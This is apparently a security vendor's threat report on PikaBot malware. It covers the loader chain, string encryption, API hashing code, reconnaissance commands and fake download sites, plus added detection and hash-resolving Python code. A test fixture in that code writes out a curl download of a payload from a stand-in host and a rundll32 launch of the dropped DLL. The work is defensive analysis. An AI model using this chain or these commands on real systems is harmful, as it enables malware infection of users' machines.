Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.

We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.

Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.

In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.

Here’s the latest from our TRU Team…

What did we find?

Since October 2023, our Threat Response Unit (TRU) has observed multiple instances of the Pikabot malware affecting customers within the manufacturing and business services industries.

The initial infection stems from an email containing a link to download a ZIP archive, which, in turn, contains an obfuscated JavaScript file responsible for infecting the device when the user executes it.

Upon cleaning up the JS file, we can see that it creates the directory “EpfijglsorgIjfkmvofguv” under %SYSTEMDRIVE% (2 in Figure 1), then attempts to retrieve the malicious .DAT file from the URLs (1, 2, 5) via curl. Upon successful retrieval, the downloaded file is renamed to Wiflgodjvo.dll. The malicious DLL is then run with rundll32.exe using the export name “Enter” (4 in Figure 1).

Figure 1: Cleaned-up JavaScript file
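Turning the chain in Figure 1 into a detection, as an added example that is not eSentire's code: a small Python checker walks process-creation events and flags a script host spawning curl to fetch a .DAT file, and rundll32 invoking the export “Enter” on a DLL outside the Windows directory. The event field names, the assumption that the user-run JS executes under wscript.exe or cscript.exe, and the sample events are all constructed for this illustration.

```python
# Added example (not eSentire's code): flag the two stages of the Figure 1 chain
# in process-creation telemetry. Field names, the script-host assumption and the
# sample events below are constructed for the illustration.
import re
from typing import Dict, List, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}  # assumed hosts for the user-run .js

# Constructed sample telemetry (not from the incident); the directory and DLL
# names match the ones seen in the cleaned-up script. Last event is benign noise.
EVENTS: List[Dict[str, str]] = [
    {"pid": "4001", "ppid": "3000", "image": "wscript.exe",
     "cmdline": r"wscript.exe C:\Users\u\Downloads\invoice.js"},
    {"pid": "4002", "ppid": "4001", "image": "curl.exe",
     "cmdline": r"curl.exe -o C:\EpfijglsorgIjfkmvofguv\payload.dat http://example.invalid/p.dat"},
    {"pid": "4003", "ppid": "4001", "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\EpfijglsorgIjfkmvofguv\Wiflgodjvo.dll,Enter"},
    {"pid": "4010", "ppid": "1000", "image": "rundll32.exe",
     "cmdline": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
]

# rundll32 <dll>,<export>  (optional quotes around the DLL path)
RUNDLL_RE = re.compile(r'rundll32\.exe\s+"?(?P<dll>[^",\s]+\.dll)"?\s*,\s*(?P<export>\w+)', re.I)
WINDOWS_DIR_RE = re.compile(r"[a-z]:\\windows\\", re.I)


def flag_events(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (pid, reason) findings for events matching the PikaBot loader chain."""
    by_pid = {e["pid"]: e for e in events}
    findings: List[Tuple[str, str]] = []
    for e in events:
        parent = by_pid.get(e["ppid"], {}).get("image", "").lower()
        img = e["image"].lower()
        cmd = e["cmdline"]
        # Stage 1: the script host launches curl to pull down a .DAT payload
        if img == "curl.exe" and parent in SCRIPT_HOSTS and re.search(r"\.dat\b", cmd, re.I):
            findings.append((e["pid"], "script host launched curl to fetch a .DAT file"))
        # Stage 2: rundll32 calls export "Enter" on a DLL outside the Windows directory
        m = RUNDLL_RE.search(cmd) if img == "rundll32.exe" else None
        if m and m.group("export").lower() == "enter" and not WINDOWS_DIR_RE.match(m.group("dll")):
            findings.append((e["pid"], f"rundll32 called export Enter on {m.group('dll')}"))
    return findings


if __name__ == "__main__":
    for pid, reason in flag_events(EVENTS):
        print(pid, reason)
```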

PikaBot is injected into the SearchProtocolHost.exe process via the process hollowing technique (T1055.012). The core payload of PikaBot uses inline RC4 to encrypt its strings. Upon decrypting the strings, we get base64-encoded strings, as shown in Figure 2.

The inline RC4 encryption in Pikabot is used to obfuscate its strings, making it more difficult for security researchers and automated detection systems to analyze and identify the malware’s purpose and behavior.

Figure 2: Decrypted string view in x64dbg

The RC4-decrypted base64-encoded strings then go through another decryption layer with AES, as shown in Figure 3. The AES key and IV are themselves encrypted with RC4.

Figure 3: AES decryption

For further analysis on Pikabot, please refer to the research published by OALabs here and here.

PikaBot uses API hashing (Figure 4) for only a few API calls; the rest are encrypted using the method described above. The C2 is also encrypted with the same algorithm, but with a different AES key and IV.

Here is the Python implementation of the hashing algorithm used:

def api_hashing(data, length):
    # Seed value used by the sample; uppercase ASCII letters are folded to
    # lowercase before being mixed in, so the hash is case-insensitive.
    v2 = 8387
    if data and length:
        for i in range(length):
            v4 = data[i] & 0xFF
            v5 = v4 + 32          # lowercase the character...
            if not 65 <= v4 <= 90:
                v5 = v4           # ...only if it was an uppercase 'A'-'Z'
            v2 = v5 + 5 * v2      # hash = char + 5 * hash
    return v2 & 0xFFFFFFFF        # truncate to a 32-bit value


def calculate_and_print_hash(data_string):
    data_bytes = data_string.encode()
    hash_result = api_hashing(data_bytes, len(data_bytes))
    value = hex(hash_result)
    print(f"Hash result '{data_string}': {value}")


calculate_and_print_hash("LoadLibraryA")
calculate_and_print_hash("HeapFree")
calculate_and_print_hash("GetProcAddress")
Figure 4: Hashing algorithm
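As an added example (not from the eSentire write-up) of how an analyst puts this algorithm to use: hash a list of candidate export names, then resolve hash constants recovered from a sample back to names, refusing to build a table with collisions. The candidate list and the unresolved constant are assumptions for the illustration; the hash itself is the Figure 4 algorithm.

```python
# Added example (not eSentire's code): reverse-resolve PikaBot API hashes by
# hashing candidate export names with the Figure 4 algorithm. The candidate
# list below is constructed for the illustration.
from typing import Dict, Iterable, List, Optional


def pikabot_api_hash(name: str) -> int:
    """Figure 4 algorithm: fold 'A'-'Z' to lowercase, then h = c + 5*h, 32-bit."""
    h = 8387
    for c in name.encode():
        if 65 <= c <= 90:
            c += 32
        h = c + 5 * h
    return h & 0xFFFFFFFF


def build_hash_table(names: Iterable[str]) -> Dict[int, str]:
    """Map hash -> export name; a collision between two different names is an error."""
    table: Dict[int, str] = {}
    for n in names:
        h = pikabot_api_hash(n)
        if h in table and table[h] != n:
            raise ValueError(f"collision: {n!r} and {table[h]!r} both hash to {h:#010x}")
        table[h] = n
    return table


# Assumed candidate exports; in practice this would be every export of the DLLs
# the sample resolves (kernel32.dll, ntdll.dll, ...).
CANDIDATES = ["LoadLibraryA", "HeapFree", "GetProcAddress", "VirtualAlloc", "CreateMutexW"]
TABLE = build_hash_table(CANDIDATES)


def resolve(h: int) -> Optional[str]:
    """Name for a 32-bit hash constant pulled from the sample, or None if unknown."""
    return TABLE.get(h & 0xFFFFFFFF)


def resolve_all(constants: List[int]) -> List[str]:
    """Resolve a batch of constants, labelling unknowns with their hex value."""
    return [resolve(c) or f"UNKNOWN({c:#010x})" for c in constants]


if __name__ == "__main__":
    for h, n in TABLE.items():
        print(f"{h:#010x} {n}")
```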

Upon successful infection, PikaBot gathers basic host information and sends it to its C2. The commands run on the host include:

  • netstat.exe -aon
  • ipconfig.exe /all
  • whoami.exe /all

Example of some of the information gathered by PikaBot, with format-string placeholders in place of the values:

{"29sogk11": "%s", "8MYMnroOE": "%s", "D2eHqm": "Win %d.%d %d", "Svr0U": %s, "YvqsXd96s": "%s", "Gk03HL": "%s", "KEIsAH": "%s", "6oX3zxl": %d, "J2pBsnnT": "%s", "vxcY4IafK": %d, "CoV203qs": "%s", "OLZpE2": "%s", "9NMqowk9": "%s", "TnyWDGp46": "%s", "yrjOT": "%s", "jcjIbRIYD": %d, "XPQG7Z5l": %d}

For example, D2eHqm holds the Windows version, YvqsXd96s holds the username, Gk03HL holds the system name, KEIsAH holds the processor information, J2pBsnnT holds display adapter information, vxcY4IafK holds the RAM size, CoV203qs holds the screen size, OLZpE2 holds the Pikabot ID (in our case it’s “1.1.19-gen”), and 6oX3zxl likely holds the value of the TickCount.

The payload examines the language setting of the infected system, and if it detects that the system is set to Russian or Ukrainian, it refrains from executing any further code (Figure 5).

Figure 5: Language check

Pikabot creates the hardcoded mutex value “{C1E8A9B1-57F0-47B0-AB93-C739C6592C5F}” upon successful infection to avoid reinfecting the host.

Additional Insights

In one particular customer environment, we observed an unsuccessful Pikabot infection attempt via drive-by download. In this instance, the client searched for the AnyDesk installer and stumbled across the malicious page anadesky.firstbasedso[.]com (Figure 6), from which they downloaded a malicious MSI installer signed by “The New Print Shop LTD”.

Jérôme Segura, the Senior Director of Threat Intelligence at Malwarebytes, also published an article on December 15, 2023, detailing how Pikabot leverages malicious ads for its distribution.

Figure 6: Malicious fake AnyDesk page serving PikaBot payload

Pivoting with VirusTotal, we found two more domains impersonating Slack and Zoom, as shown in Figures 7-9.

Figure 7: Malicious domains impersonating Slack and Zoom
Figure 8: Malicious page impersonating Zoom
Figure 9: Malicious page impersonating Slack

What did we do?

Using eSentire MDR for Endpoint, our team of 24/7 SOC Cyber Analysts isolated the affected host, contained the threat, and notified the customer of suspicious activities.

What can you learn from this TRU Positive?

  • The use of phishing emails containing links to download malicious ZIP archives highlights the continued reliance on social engineering by attackers. It underscores the importance of educating users about the dangers of unsolicited emails and the need for caution when downloading attachments.
  • The payload’s functionality to check the system’s language setting and halt further execution if it detects Russian or Ukrainian suggests a targeted approach to infections. This tactic could be indicative of the origin or specific objectives of the attackers.
  • The creation of a hardcoded mutex by Pikabot to avoid reinfection illustrates a common malware technique to maintain a single instance in the system. Understanding such techniques can aid in developing more effective malware detection and removal strategies.
  • The observed instances where attackers impersonated legitimate software like AnyDesk, Slack, and Zoom for malware distribution via malicious ads and websites highlight the risk of trust exploitation. This calls for vigilance when downloading software and accessing web resources, even those that appear legitimate.

Recommendations from our Threat Response Unit (TRU):

  • Protect endpoints against malware by:
    • Identifying file types that are commonly associated with security risks, such as executable files (.exe, .bat, .cmd), script files (.js, .vbs, .ps1), and certain document types that support macros (.docm, .xlsm). Then select a file type that is inherently safer and does not support executable code or active content (i.e., a plain text format like .txt).
    • Raising awareness of malware masquerading as legitimate applications, and including it in your Phishing and Security Awareness Training (PSAT) program.
      • An effective PSAT program emphasizes building cyber resilience by increasing risk awareness, rather than trying to turn everyone into security experts.

Detection Rules and Indicators of Compromise

  • You can access the YARA rule for PikaBot here.
  • You can access the IOCs related to PikaBot here.

References

Source: https://www.esentire.com/blog/the-rising-threat-of-pikabot